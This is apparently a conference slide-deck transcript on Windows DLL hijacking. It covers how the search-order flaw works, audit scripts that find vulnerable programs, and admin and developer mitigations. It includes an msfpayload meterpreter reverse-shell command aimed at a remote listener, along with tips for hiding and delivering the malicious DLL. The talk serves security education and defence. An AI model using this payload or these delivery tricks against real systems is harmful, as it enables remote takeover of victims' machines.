Dll hijacking

How To Become a Hijacking Terrorist
DLL Hijacking for fun and profit

DLL Hijacking Overview
DLL Hijacking: Trick a program to use a malicious DLL instead of the normal DLL
HDM found that when opening a file associated to a program, the file will look in the local path for the referenced DLLs of the program before looking inside the correct location of the associated executable

PCAP Example - Normal

PCAP Example - Hijacked

DLL Hijacking
Old trick – new dog
Linux removed “.” from $PATH
Client side, WebDAV, or remote SMB share
Widely exploitable
Easy to detect

DLLHijackAuditKit
Automates the detection
Generates test scenarios for each file extension and automatically creates an exploitable file
Searches every extension

Audit.js
Download procmon from sysinternals
Opens procmon and filters for operations that begins with "IRP_MJ_" or "FASTIO_".
Use WMI to query the local system and file all the possible file extensions it can handle
Generate test cases for each file scenario. Make a dummy file with the word “Howdy…” in it named after the extension being tested
Automatically open each file from command line
While opening, log file system activity in procmon
Wait a few seconds and then close out the program and try the next file
When you get all done, you need to save the procmon file as LogFile.csv. This logfile will have the executable related to the file that was opened and also the path that it tried to look for a DLL.

Analyze.js
Parses the LogFile.csv for the executable and the DLL that it was looking for (wireshark.exe and airpcap.dll)
Generate test scenarios and copy in a dummy DLL named after the real DLL it’s looking for.
run the file again
if it is successful, the DLL will create a txt file named exploit.txt
Repeat this step for each EXE and DLL pair to verify which are actively exploitable

Real World Attack Scenario
Generate Payload: msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dll
Rename to the DLL that the EXE is looking for
Put the DLL in the same folder as a file with an associated extension
Deliver file and DLL

Tricks
Use the Hidden attribute
Obfuscate with lots of other files
MSFEncode the payload
Create a link to a subfolder
Road Apples
Host a SMB share on the net!
Create a WebDAV share

Mitigation
Admins:
Microsoft tool to catch illegal DLL references
http://support.microsoft.com/kb/2264107
CWDIllegalInDllSearch registry
Disable WebDAV
Disable outbound SMB (139 445)
Developers:
Load DLL’s securely

References
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://blog.metasploit.com/2010/08/better-faster-stronger.html

0day (AFAIK)
RDP .dll

http://www.antitree.com	176
http://www.rochester2600.com	25
http://173.255.202.215	22
http://antitree.com	10
http://10.2.2.13:8000	8
http://10.2.2.13	2

Dll hijacking

by antitree

Accessibility

Categories

Upload Details

Usage Rights

6 Embeds 243

Statistics

Dll hijacking Presentation Transcript